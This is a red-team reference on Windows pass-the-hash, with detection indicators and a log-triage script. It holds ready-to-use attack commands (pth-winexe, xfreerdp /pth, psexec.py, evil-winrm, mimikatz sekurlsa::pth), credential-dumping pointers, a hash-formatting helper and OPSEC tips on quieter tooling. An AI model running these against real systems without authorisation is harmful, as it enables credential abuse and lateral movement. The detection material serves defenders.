Pass-the-hash (PtH) works against Windows systems and services that accept NTLM authentication. The NTLM challenge-response is computed from the NT hash, not from the password, so the hash alone is sufficient and the plaintext password is never needed.

Requirements

  • SMB (TCP 445) reachable on the target (for the psexec-style vectors below; RDP and WinRM have their own requirements)
  • local admin credentials / privileges to connect to the ADMIN$ SMB share
  • File and Print Sharing feature must be enabled (it is what exposes ADMIN$ / C$)
  • NTLM hash of a local admin (or a privileged domain account); dump it with Mimikatz sekurlsa::logonpasswords / lsadump::sam or Impacket's secretsdump.py

Security Update

Since the May 2014 update (KB2871997), PtH over the network is commonly said to work only for domain accounts and the built-in local Administrator (RID 500), not for other local accounts in the Administrators group. The mechanism behind this is UAC "remote restrictions" (present since Vista): a non-RID-500 local admin gets a filtered, non-admin token on a network logon, so ADMIN$ access and service creation fail. The switch is the LocalAccountTokenFilterPolicy DWORD under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System; a value of 1 disables the restriction (and other local admins become usable again), while FilterAdministratorToken=1 extends it to RID 500 as well.

  • PtH may be detected by:
    • a new read/write handle to LSASS (Sysmon Event ID 10 with TargetImage lsass.exe and PROCESS_VM_READ / PROCESS_VM_WRITE in GrantedAccess); sekurlsa::pth needs it to patch the new logon session
    • echo $hex1 > \\.\pipe\$hex2 patterns in command-line logging (Sysmon Event ID 1 / Security 4688); this is the process that Cobalt Strike's pth command spawns through Mimikatz (sekurlsa::pth /run:) in order to steal its token
  • RTO: "Suspicious Handle to LSASS" saved search
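The two indicators above, turned into a minimal triage over log lines. This is an added example, not from the original notes or from any vendor tooling: the log lines are constructed for the demo and only mimic Sysmon field names (EventID, TargetImage, GrantedAccess, CommandLine); the function names are made up here.

```shell
#!/bin/sh
# Added example (not part of the original page): flag the two PtH
# indicators over constructed, Sysmon-style key=value log lines.

# Constructed sample log, one record per line (fields imitate Sysmon).
SAMPLE_LOG='EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000
EventID=10 SourceImage=C:\Users\bob\mk.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010
EventID=10 SourceImage=C:\Users\bob\mk.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1438
EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo a1b2c3d4e5 > \\.\pipe\a1b2c3d4e5
EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo hello'

# Indicator 1: process-access events (Event ID 10) on lsass.exe whose
# access mask contains PROCESS_VM_READ (0x0010) or PROCESS_VM_WRITE (0x0020).
# A pure query handle (e.g. 0x1000) is not flagged.
lsass_rw_handles() {
    printf '%s\n' "$SAMPLE_LOG" \
    | grep -i 'EventID=10 .*TargetImage=.*\\lsass\.exe' \
    | while IFS= read -r line; do
        mask=${line##*GrantedAccess=}
        mask=${mask%% *}
        if [ $(( mask & 0x30 )) -ne 0 ]; then
            printf '%s\n' "$line"
        fi
      done
}

# Indicator 2: command lines that echo a hex token into a named pipe,
# i.e. "echo <hex> > \\.\pipe\<hex>".
pipe_echo_cmds() {
    printf '%s\n' "$SAMPLE_LOG" \
    | grep -iE 'echo +[0-9a-f]+ *> *\\\\\.\\pipe\\[0-9a-f]+'
}

# Stand-alone run: print what each rule would have raised.
echo '== suspicious LSASS handles =='
lsass_rw_handles
echo '== echo-to-named-pipe command lines =='
pipe_echo_cmds
```

The mask test is on the two VM access bits rather than on a fixed list of values such as 0x1010, so variants like 0x1438 are caught too; in a real deployment you would exclude known-good SourceImage values (AV, EDR) the same way the first sample line is a benign svchost.exe handle.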

Some tools also ask for an LM hash. If the account has no LM hash (modern Windows stores only the NT hash), use aad3b435b51404eeaad3b435b51404ee, the LM hash of the empty string, which the tools treat as "no LM hash". What actually authenticates is the NT hash; "NTLM hash" in these notes means the NT hash.
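A small helper for the LM:NT formatting that Impacket's -hashes and pth-winexe's user%hash syntax expect. It is an added example, not from the original notes or from Impacket: it accepts either a bare NT hash or an LM:NT pair, fills in the blank LM hash when only the NT hash is given, lower-cases the result, and rejects anything that is not 32 hex characters. The function names and the sample hashes in the demo are this example's own (the NT hash shown is that of the empty string).

```shell
#!/bin/sh
# Added example (not part of the original page): normalise hash input into
# the "lm:nt" form used by Impacket (-hashes) and pth-winexe (user%lm:nt).

BLANK_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty string

# is_hash32 STRING -> exit 0 if STRING is exactly 32 hex characters
is_hash32() {
    printf '%s' "$1" | grep -qiE '^[0-9a-f]{32}$'
}

# hashes_arg INPUT -> prints "lm:nt", or exits 1 on malformed input.
# INPUT may be "NT", "LM:NT" or ":NT" (empty LM part = no LM hash).
hashes_arg() {
    in=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$in" in
        *:*) lm=${in%%:*}; nt=${in#*:} ;;
        *)   lm=$BLANK_LM;  nt=$in ;;
    esac
    if [ -z "$lm" ]; then
        lm=$BLANK_LM
    fi
    is_hash32 "$lm" && is_hash32 "$nt" || return 1
    printf '%s:%s\n' "$lm" "$nt"
}

# winexe_user_arg DOMAIN USER INPUT -> prints "DOMAIN/USER%lm:nt" for pth-winexe -U
winexe_user_arg() {
    h=$(hashes_arg "$3") || return 1
    printf '%s/%s%%%s\n' "$1" "$2" "$h"
}

# Demo: NT hash only (upper case), then an LM:NT pair with an empty LM part.
hashes_arg 31D6CFE0D16AE931B73C59D7E0C089C0
hashes_arg :31d6cfe0d16ae931b73c59d7e0c089c0
winexe_user_arg EXAMPLE jsmith 31d6cfe0d16ae931b73c59d7e0c089c0
```

Typical use is `psexec.py -hashes "$(hashes_arg "$NT")" DOMAIN/user@host`; a truncated or pasted-with-whitespace hash fails early here instead of producing a confusing STATUS_LOGON_FAILURE from the target.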

Tools

Note: Cobalt Strike also supports PtH through its built-in Mimikatz (the Beacon pth command runs sekurlsa::pth and impersonates the token of the process it spawns).

# pth-winexe (Linux only): run a command over SMB; LM_HASH may be the blank value above
pth-winexe -U "$DOMAIN/$USER%$LM_HASH:$NTLM_HASH" //$HOST "$CMD"
 
# RDP: only works if the target allows Restricted Admin mode
xfreerdp /v:$VICTIM_IP /u:DOMAIN\\MyUser /pth:$NTLM_HASH
 
# psexec.py from Impacket (the LM part may be left empty: -hashes :$NTLM_HASH)
psexec.py -hashes $LM_HASH:$NTLM_HASH DOMAIN/MyUser@$VICTIM_IP
 
# WinRM via evil-winrm (needs WinRM enabled; user must be a local admin or in Remote Management Users)
evil-winrm -i $VICTIM_IP -u MyUser -H $NTLM_HASH
 
# Mimikatz: needs local admin / SeDebugPrivilege (privilege::debug). Pivots to the user by
# starting a new process (cmd.exe by default, or /run:<program>) whose logon session carries the hash
mimikatz "privilege::debug" "sekurlsa::pth /user:jsmith /domain:example.com /ntlm:aabbccddeeff..." "exit"

Warning & OPSEC

Sysinternals PsExec (the Windows binary) accepts only a password, so PtH with "psexec" means Impacket's psexec.py (or pth-winexe). psexec.py always ends up as NT AUTHORITY\SYSTEM, because it uploads a service binary to ADMIN$ and runs the command from that service; that is noisy (file written to ADMIN$, service installation logged as System Event ID 7045) and SYSTEM may not be preferable when you want the user's own context. wmiexec.py from the same toolkit takes -hashes too, runs as the authenticating user rather than SYSTEM, and creates no service.

Use with Kerberos

See: pass-the-key